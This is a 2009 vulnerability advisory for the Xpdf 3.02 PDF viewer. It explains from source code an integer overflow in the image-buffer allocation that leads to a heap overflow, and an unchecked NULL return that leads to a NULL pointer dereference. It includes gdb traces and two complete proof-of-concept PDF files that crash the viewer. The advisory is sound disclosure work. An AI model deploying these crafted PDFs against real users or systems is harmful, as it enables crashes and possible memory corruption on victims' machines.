Name: Xpdf - Integer overflow which causes heap overflow and NULL pointer derefernce=0D
Author: Adam Zabrocki / HISPASEC ( or )=0D
Date: July 06, 2009=0D
=0D
=0D
Issue:=0D
=0D
Xpdf allows local and remote attackers to overflow buffer on heap via integer overflow vulnerability.=0D
Xpdf is prone to NULL pointer dereference attack.=0D
=0D
=0D
Description:=0D
=0D
Xpdf is an open-source viewer for Portable Document Format (PDF) files. Xpdf project also includes=0D
a PDF text extractor, PDF-to-PostScript converter, and various other utilities. Xpdf runs under=0D
the X Window System on UNIX, VMS, and OS/2. The non-X components (pdftops, pdftotext, etc.) also=0D
run on Win32 systems and should run on pretty much any system with a decent C++ compiler.=0D
Xpdf is designed to be small and efficient. It can use Type 1, TrueType, or standard X fonts. =0D
=0D
=0D
Details:=0D
=0D
=0D
Let's look in code:=0D
=0D
"./goo/gmem.cc"=0D
void *gmalloc(int size) GMEM_EXCEP {=0D
#ifdef DEBUG_MEM =0D
...=0D
#else =0D
void *p;=0D
=0D
if (size < 0) {=0D
#if USE_EXCEPTIONS =0D
...=0D
#else =0D
fprintf(stderr, "Invalid memory allocation size\n");=0D
exit(1);=0D
#endif =0D
}=0D
if (size == 0) {=0D
return NULL;=0D
}=0D
if (!(p = malloc(size))) {=0D
#if USE_EXCEPTIONS =0D
...=0D
#else =0D
fprintf(stderr, "Out of memory\n");=0D
exit(1);=0D
#endif =0D
}=0D
return p;=0D
#endif =0D
}=0D
=0D
Ok. So if we pass negative value to gmalloc() than xpdf finish work via exit() call=0D
and print to stderr "Invalid memory allocation size\n". If we pass 0 (zero) value=0D
than function return NULL. In other cases there will be normal call to malloc() func.=0D
=0D
Ok so let's look further.=0D
=0D
"./splash/Splash.cc"=0D
SplashError Splash::drawImage(SplashImageSource src, void *srcData,=0D
SplashColorMode srcMode, GBool srcAlpha,=0D
int w, int h, SplashCoord *mat) {=0D
...=0D
...=0D
SplashClipResult clipRes, clipRes2;=0D
int yp, yq, yt, yStep, lastYStep;=0D
int xp, xq, xt, xStep, xSrc;=0D
...=0D
SplashColorPtr colorBuf, p;=0D
...=0D
#if SPLASH_CMYK =0D
int pixAcc0, pixAcc1, pixAcc2, pixAcc3;=0D
#else =0D
int pixAcc0, pixAcc1, pixAcc2;=0D
#endif =0D
...=0D
int nComps, n, m, i, j;=0D
=0D
...=0D
// check color modes=0D
ok = gFalse; // make gcc happy=0D
nComps = 0; // make gcc happy=0D
switch (bitmap->mode) {=0D
case splashModeMono1:=0D
case splashModeMono8:=0D
ok = srcMode == splashModeMono8;=0D
nComps = 1;=0D
break;=0D
case splashModeRGB8:=0D
ok = srcMode == splashModeRGB8;=0D
nComps = 3;=0D
break;=0D
case splashModeBGR8:=0D
ok = srcMode == splashModeBGR8;=0D
nComps = 3;=0D
break;=0D
#if SPLASH_CMYK =0D
case splashModeCMYK8:=0D
ok = srcMode == splashModeCMYK8;=0D
nComps = 4;=0D
break;=0D
#endif =0D
}=0D
if (!ok) {=0D
return splashErrModeMismatch;=0D
}=0D
...=0D
...=0D
=0D
// compute Bresenham parameters for x and y scaling=0D
yp = h / scaledHeight;=0D
yq = h % scaledHeight;=0D
xp = w / scaledWidth;=0D
xq = w % scaledWidth;=0D
=0D
colorBuf = (SplashColorPtr)gmalloc((yp + 1) * w * nComps); <- [1] !!!=0D
if (srcAlpha) {=0D
alphaBuf = (Guchar *)gmalloc((yp + 1) * w);=0D
} else {=0D
alphaBuf = NULL;=0D
}=0D
=0D
pixAcc0 = pixAcc1 = pixAcc2 = 0; // make gcc happy=0D
=0D
...=0D
...=0D
=0D
if (srcAlpha) {=0D
=0D
...=0D
=0D
...=0D
} else {=0D
=0D
// init y scale Bresenham=0D
yt = 0;=0D
lastYStep = 1;=0D
=0D
for (y = 0; y < scaledHeight; ++y) {=0D
=0D
// y scale Bresenham=0D
yStep = yp;=0D
yt += yq;=0D
if (yt >= scaledHeight) {=0D
yt -= scaledHeight;=0D
++yStep;=0D
}=0D
=0D
// read row(s) from image=0D
n = (yp > 0) ? yStep : lastYStep;=0D
if (n > 0) {=0D
p = colorBuf;=0D
for (i = 0; i < n; ++i) {=0D
(*src)(srcData, p, NULL); <- [!!] !!!=0D
p += w * nComps;=0D
}=0D
}=0D
=0D
...=0D
=0D
...=0D
=0D
switch (srcMode) {=0D
=0D
...=0D
...=0D
=0D
case splashModeRGB8:=0D
case splashModeBGR8:=0D
for (x = 0; x < scaledWidth; ++x) {=0D
=0D
// x scale Bresenham=0D
xStep = xp;=0D
xt += xq;=0D
if (xt >= scaledWidth) {=0D
xt -= scaledWidth;=0D
++xStep;=0D
}=0D
=0D
...=0D
...=0D
=0D
// compute the filtered pixel at (x,y) after the x and y scaling=0D
// operations=0D
m = xStep > 0 ? xStep : 1;=0D
p = colorBuf + xSrc * 3; <- [2] !!!=0D
pixAcc0 = pixAcc1 = pixAcc2 = 0;=0D
for (i = 0; i < n; ++i) {=0D
for (j = 0; j < m; ++j) {=0D
pixAcc0 += *p++; <- [3] !!!=0D
pixAcc1 += *p++;=0D
pixAcc2 += *p++;=0D
}=0D
p += 3 * (w - m);=0D
}=0D
=0D
...=0D
...=0D
=0D
...=0D
...=0D
}=0D
=0D
=0D
We immediately control variable "w" and "h". So if we set variable "w" to value zero (0).=0D
After that call to gmalloc (in [1]) will return NULL. There is no check what value was returned!=0D
So in [2] we have p = NULL + xSrc*3, xSrc we can set to 0 (zero) too. So in fact we can set "p"=0D
to NULL value. In [3] we have NULL pointer dereference!=0D
=0D
Ok let's look for other scenario. What will happen if variable "w" have BIG value? Let's look:=0D
=0D
(yp + 1) * w * nComps=0D
=0D
"w" we can control immediately, "nComps" have some static value and "yp" we can controle indirectly=0D
because:=0D
=0D
yp = h / scaledHeight;=0D
=0D
"h" we control once again immediately! So in fact we can do integer overflow and allocate less memory=0D
than it should be. For example:=0D
=0D
h = 2000000000=0D
w = 1102=0D
nComps = 3=0D
yp / scaledHeight = 15873015, for standard scaledHeight = 126=0D
=0D
so it should be => (15873015+1)*1102*3 = 15873016*1102*3 = 52476190896=0D
but in fact after integer overflow it is:=0D
yp[15873015]+1)*w[1102]*nComps[3] = 936583344=0D
=0D
So it is too little :)=0D
=0D
In this scenario after call to gmalloc() program will go after some instruction to code in [!!].=0D
in fact this is call to some pointer which redirect us to function...=0D
=0D
=0D
"xpdf/SplashOutputDev.cc"=0D
GBool SplashOutputDev::imageSrc(void *data, SplashColorPtr colorLine,=0D
Guchar *alphaLine) {=0D
SplashOutImageData *imgData = (SplashOutImageData *)data;=0D
...=0D
SplashColorPtr q, col;=0D
...=0D
int nComps, x;=0D
=0D
...=0D
=0D
if (imgData->lookup) {=0D
switch (imgData->colorMode) {=0D
...=0D
...=0D
case splashModeRGB8:=0D
case splashModeBGR8:=0D
for (x = 0, p = imgData->imgStr->getLine(), q = colorLine;=0D
x < imgData->width;=0D
++x, p += nComps) {=0D
imgData->colorMap->getRGB(p, &rgb);=0D
*q++ = colToByte(rgb.r);=0D
*q++ = colToByte(rgb.g);=0D
*q++ = colToByte(rgb.b);=0D
}=0D
break;=0D
...=0D
...=0D
}=0D
=0D
And here is overflow! We have too little allocated memory but program don't know about it=0D
and try to convert colors and write in this memory by call:=0D
=0D
*q++ = colToByte(rgb.r);=0D
*q++ = colToByte(rgb.g);=0D
*q++ = colToByte(rgb.b);=0D
=0D
and the end of working loop is via this compare:=0D
=0D
x < imgData->width;=0D
=0D
So we overflow memory.=0D
=0D
=0D
=0D
=0D
Proof of concept=0D
=0D
Let's try to do this scenario:=0D
[root@pi3book xpdf-3.02]# xpdf elo.pdf =0D
Error: PDF file is damaged - attempting to reconstruct xref table...=0D
Naruszenie ochrony pamięci=0D
[root@pi3book xpdf-3.02]#=0D
=0D
and gdb output:=0D
=0D
(gdb) bt=0D
#0 0x080c222a in SplashOutputDev::imageSrc (data=0xbfffec84, colorLine=0xb7fe46de '�' ..., alphaLine=0x0) at SplashOutputDev.cc:1848=0D
#1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84, =0D
srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532=0D
#2 0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd0f8, state=0x81f0050, ref=0xbfffeebc, str=0x81f0960, width=1102, height=2000000000, =0D
colorMap=0x81f8ea0, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048=0D
#3 0x080601d9 in Gfx::doImage (this=0x81e5528, ref=0xbfffeebc, str=0x81f0960, inlineImg=0) at Gfx.cc:3657=0D
#4 0x08066799 in Gfx::opXObject (this=0x81e5528, args=0xbfffef34, numArgs=1) at Gfx.cc:3330=0D
#5 0x080612bd in Gfx::go (this=0x81e5528, topLevel=1) at Gfx.cc:581=0D
#6 0x080615ea in Gfx::display (this=0x81e5528, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553=0D
#7 0x080a55cb in Page::displaySlice (this=0x81df9f0, out=0x81bd0f8, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744, =0D
sliceH=1052, printing=0, catalog=0x81de638, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317=0D
#8 0x080aa485 in PDFCore::needTile (this=0x81bcab8, page=0x81e5468, x=0, y=0) at PDFCore.cc:835=0D
#9 0x080abc77 in PDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658=0D
#10 0x080de837 in XPDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285=0D
#11 0x080a6861 in PDFCore::displayPage (this=0xbfffe88c, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292=0D
#12 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)=0D
at XPDFViewer.cc:297=0D
#13 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228=0D
#14 0x080edcbb in main (argc=Cannot access memory at address 0x0=0D
) at xpdf.cc:311=0D
(gdb) x/i $eip=0D
0x80c222a <_ZN15SplashOutputDev8imageSrcEPvPhS1_+346>: mov %al,0x1(%ebx)=0D
(gdb) i r ebx=0D
ebx 0xb7fe4fff -1208070145=0D
(gdb) x/x $ebx=0D
0xb7fe4fff: Cannot access memory at address 0xb7fe4fff=0D
(gdb) print q=0D
$1 = (Guchar *) 0xb7fe4fff "�" =0D
(gdb) print x=0D
$2 = 780=0D
(gdb) print ((SplashOutImageData *)data)->width=0D
$3 = 1102=0D
(gdb) up=0D
#1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84, =0D
srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532=0D
2532 (*src)(srcData, p, NULL);=0D
(gdb) print colorBuf =0D
$4 = (=0D
SplashColorPtr) 0x7ffae008 "\204��a\210�a\210�a\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210"...=0D
(gdb) print w=0D
$5 = 1102=0D
(gdb) print h=0D
$6 = 2000000000=0D
(gdb) print nComps =0D
$7 = 3=0D
(gdb) list=0D
2527 // read row(s) from image=0D
2528 n = (yp > 0) ? yStep : lastYStep;=0D
2529 if (n > 0) {=0D
2530 p = colorBuf;=0D
2531 for (i = 0; i < n; ++i) {=0D
2532 (*src)(srcData, p, NULL);=0D
2533 p += w * nComps;=0D
2534 }=0D
2535 }=0D
2536 lastYStep = yStep;=0D
(gdb) print n=0D
$8 = 15873015=0D
(gdb) print p=0D
$9 = (Guchar *) 0xb7fe46de '�' ...=0D
(gdb) =0D
=0D
So it is exactly what we analyze source :) Look now what will happen when variable "w" have value 0 (zero) - in fact=0D
now we will have NULL pointer dereference. Let's look:=0D
=0D
[root@pi3book xpdf-3.02]# xpdf jajo.pdf =0D
Error: PDF file is damaged - attempting to reconstruct xref table...=0D
Naruszenie ochrony pamięci (core dumped)=0D
[root@pi3book xpdf-3.02]# =0D
=0D
and gdb output:=0D
=0D
(gdb) bt=0D
#0 Splash::drawImage (this=0x81e58e0, src=0x80c20d0 , srcData=0xbfffec84, =0D
srcMode=splashModeRGB8, srcAlpha=0, w=0, h=2000000000, mat=0xbfffec50) at Splash.cc:2667=0D
#1 0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd100, state=0x81f0090, ref=0xbfffeebc, str=0x81f09c0, width=0, height=2000000000, =0D
colorMap=0x81f8f00, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048=0D
#2 0x080601d9 in Gfx::doImage (this=0x81e54c8, ref=0xbfffeebc, str=0x81f09c0, inlineImg=0) at Gfx.cc:3657=0D
#3 0x08066799 in Gfx::opXObject (this=0x81e54c8, args=0xbfffef34, numArgs=1) at Gfx.cc:3330=0D
#4 0x080612bd in Gfx::go (this=0x81e54c8, topLevel=1) at Gfx.cc:581=0D
#5 0x080615ea in Gfx::display (this=0x81e54c8, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553=0D
#6 0x080a55cb in Page::displaySlice (this=0x81dfa08, out=0x81bd100, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744, =0D
sliceH=1052, printing=0, catalog=0x81de718, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317=0D
#7 0x080aa485 in PDFCore::needTile (this=0x81bcac0, page=0x81e5408, x=0, y=0) at PDFCore.cc:835=0D
#8 0x080abc77 in PDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658=0D
#9 0x080de837 in XPDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285=0D
#10 0x080a6861 in PDFCore::displayPage (this=0x0, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292=0D
#11 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)=0D
at XPDFViewer.cc:297=0D
#12 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228=0D
#13 0x080edcbb in main (argc=Cannot access memory at address 0x0=0D
) at xpdf.cc:311=0D
(gdb) print w=0D
$1 = 0=0D
(gdb) print i=0D
$2 = 0=0D
(gdb) print j=0D
$3 = 0=0D
(gdb) print n=0D
$4 = 15873015=0D
(gdb) print m=0D
$5 = 1=0D
(gdb) print p=0D
$6 = (Guchar *) 0x0=0D
(gdb) print pixAcc0=0D
$7 = 0=0D
(gdb) x/i $eip=0D
0x80ff720 <_ZN6Splash9drawImageEPFiPvPhS1_ES0_15SplashColorModeiiiPd+9488>: movzbl (%ebx),%eax=0D
(gdb) i r ebx=0D
ebx 0x0 0=0D
(gdb) x/x $ebx=0D
0x0: Cannot access memory at address 0x0=0D
(gdb) =0D
=0D
That's all. Everything is exacly what we analyse.=0D
=0D
[1] - NULL pointer dereference:=0D
=0D
-------------- xpdf-poc-null-pointer-dereference.pdf -------------=0D
%PDF-1.3=0D
% 'BasicFonts': class PDFDictionary =0D
1 0 obj=0D
% The standard fonts dictionary=0D
<< /F1 2 0 R >>=0D
endobj=0D
% 'F1': class PDFType1Font =0D
2 0 obj=0D
% Font Helvetica=0D
<< /BaseFont /Helvetica=0D
/Encoding /WinAnsiEncoding=0D
/Name /F1=0D
/Subtype /Type1=0D
/Type /Font >>=0D
endobj=0D
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject =0D
3 0 obj=0D
<< /BitsPerComponent 8=0D
/ColorSpace /DeviceRGB=0D
/Filter [ /ASCII85Decode=0D
/FlateDecode ]=0D
/Height 2000000000=0D
/Length 61=0D
/Subtype /Image=0D
/Type /XObject=0D
/Width 0 >>=0D
stream=0D
GarPPGWE%h$j7l8U/endstream=0D
=0D
endobj=0D
% 'Page1': class PDFPage =0D
4 0 obj=0D
% Page dictionary=0D
<< /Contents 8 0 R=0D
/MediaBox [ 0=0D
0=0D
595.2756=0D
841.8898 ]=0D
/Parent 7 0 R=0D
/Resources << /Font 1 0 R=0D
/ProcSet [ /PDF=0D
/Text=0D
/ImageB=0D
/ImageC=0D
/ImageI ]=0D
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>=0D
/Rotate 0=0D
/Trans << >>=0D
/Type /Page >>=0D
endobj=0D
% 'R5': class PDFCatalog =0D
5 0 obj=0D
% Document Root=0D
<< /Outlines 9 0 R=0D
/PageMode /UseNone=0D
/Pages 7 0 R=0D
/Type /Catalog >>=0D
endobj=0D
% 'R6': class PDFInfo =0D
6 0 obj=0D
<< /Author (anonymous)=0D
/CreationDate (20090525000415)=0D
/Keywords ()=0D
/Producer (ReportLab http://www.reportlab.com)=0D
/Subject (unspecified)=0D
/Title (untitled) >>=0D
endobj=0D
% 'R7': class PDFPages =0D
7 0 obj=0D
% page tree=0D
<< /Count 1=0D
/Kids [ 4 0 R ]=0D
/Type /Pages >>=0D
endobj=0D
% 'R8': class PDFStream =0D
8 0 obj=0D
% page stream=0D
<< /Filter [ /ASCII85Decode=0D
/FlateDecode ]=0D
/Length 137 >>=0D
stream=0D
endstream=0D">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream=0D
=0D
endobj=0D
% 'R9': class PDFOutlines =0D
9 0 obj=0D
<< /Count 0=0D
/Type /Outlines >>=0D
endobj=0D
xref=0D
0 10=0D
0000000000 65535 f=0D
0000000113 00000 n=0D
0000000209 00000 n=0D
0000000415 00000 n=0D
0000000710 00000 n=0D
0000001052 00000 n=0D
0000001186 00000 n=0D
0000001397 00000 n=0D
0000001502 00000 n=0D
0000001783 00000 n=0D
trailer=0D
<< /ID =0D
% ReportLab generated PDF document -- digest (http://www.reportlab.com) =0D
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)] =0D
=0D
/Info 6 0 R=0D
/Root 5 0 R=0D
/Size 10 >>=0D
startxref=0D
1834=0D
%%EOF=0D
-------------- xpdf-poc-null-pointer-dereference.pdf -------------=0D
=0D
=0D
[2] - Integer overflow:=0D
=0D
-------------- xpdf-poc-integer-overflow.pdf -------------=0D
%PDF-1.3=0D
% 'BasicFonts': class PDFDictionary =0D
1 0 obj=0D
% The standard fonts dictionary=0D
<< /F1 2 0 R >>=0D
endobj=0D
% 'F1': class PDFType1Font =0D
2 0 obj=0D
% Font Helvetica=0D
<< /BaseFont /Helvetica=0D
/Encoding /WinAnsiEncoding=0D
/Name /F1=0D
/Subtype /Type1=0D
/Type /Font >>=0D
endobj=0D
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject =0D
3 0 obj=0D
<< /BitsPerComponent 8=0D
/ColorSpace /DeviceRGB=0D
/Filter [ /ASCII85Decode=0D
/FlateDecode ]=0D
/Height 2000000000=0D
/Length 61=0D
/Subtype /Image=0D
/Type /XObject=0D
/Width 1102 >>=0D
stream=0D
GarPPGWE%h$j7l8U/endstream=0D
=0D
endobj=0D
% 'Page1': class PDFPage =0D
4 0 obj=0D
% Page dictionary=0D
<< /Contents 8 0 R=0D
/MediaBox [ 0=0D
0=0D
595.2756=0D
841.8898 ]=0D
/Parent 7 0 R=0D
/Resources << /Font 1 0 R=0D
/ProcSet [ /PDF=0D
/Text=0D
/ImageB=0D
/ImageC=0D
/ImageI ]=0D
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>=0D
/Rotate 0=0D
/Trans << >>=0D
/Type /Page >>=0D
endobj=0D
% 'R5': class PDFCatalog =0D
5 0 obj=0D
% Document Root=0D
<< /Outlines 9 0 R=0D
/PageMode /UseNone=0D
/Pages 7 0 R=0D
/Type /Catalog >>=0D
endobj=0D
% 'R6': class PDFInfo =0D
6 0 obj=0D
<< /Author (anonymous)=0D
/CreationDate (20090525000415)=0D
/Keywords ()=0D
/Producer (ReportLab http://www.reportlab.com)=0D
/Subject (unspecified)=0D
/Title (untitled) >>=0D
endobj=0D
% 'R7': class PDFPages =0D
7 0 obj=0D
% page tree=0D
<< /Count 1=0D
/Kids [ 4 0 R ]=0D
/Type /Pages >>=0D
endobj=0D
% 'R8': class PDFStream =0D
8 0 obj=0D
% page stream=0D
<< /Filter [ /ASCII85Decode=0D
/FlateDecode ]=0D
/Length 137 >>=0D
stream=0D
endstream=0D">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream=0D
=0D
endobj=0D
% 'R9': class PDFOutlines =0D
9 0 obj=0D
<< /Count 0=0D
/Type /Outlines >>=0D
endobj=0D
xref=0D
0 10=0D
0000000000 65535 f=0D
0000000113 00000 n=0D
0000000209 00000 n=0D
0000000415 00000 n=0D
0000000710 00000 n=0D
0000001052 00000 n=0D
0000001186 00000 n=0D
0000001397 00000 n=0D
0000001502 00000 n=0D
0000001783 00000 n=0D
trailer=0D
<< /ID =0D
% ReportLab generated PDF document -- digest (http://www.reportlab.com) =0D
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)] =0D
=0D
/Info 6 0 R=0D
/Root 5 0 R=0D
/Size 10 >>=0D
startxref=0D
1834=0D
%%EOF=0D
=0D
-------------- xpdf-poc-integer-overflow.pdf -------------=0D
=0D
=0D
Greets=0D
=0D
Guys from HISPASEC, snoop, thorkill, Piotr Bania, guys from SecurityReason,=0D
#lam3rz@IRCNET and #plhack@IRCNET=0D
=0D
=0D
Disclaimer=0D
=0D
This document and all the information it contains is provided "as is",=0D
without any warranty. The author is not responsible for the=0D
misuse of the information provided in this advisory. The advisory is=0D
provided for educational purposes only.=0D
=0D
Permission is hereby granted to redistribute this advisory, providing=0D
that no changes are made and that the copyright notices and=0D
disclaimers remain intact.=0D
=0D
=0D
Ending words...=0D
=0D
That's all. I test it on version 3.02 with all security patches. Probably all versions=0D
are vulnerability. Thanks and Best regards Adam Zabrocki (pi3 / pi3ki31ny).=0D
=0D
=0D
=0D
Disclosure Timeline=0D
=0D
*) 14 October, 2009 - Vendor release patch=0D
...=0D
...=0D
*) 27 Jult, 2009 - replay with vendor=0D
*) 23 Jult, 2009 - contact with vendor=0D
*) 06 July, 2009 - exploit bug and write advisory=0D
*) 04 July, 2009 - found bug=0D
=0D
=0D
=0D
--=0D
http://hispasec.com=0D
http://pi3.com.pl=0D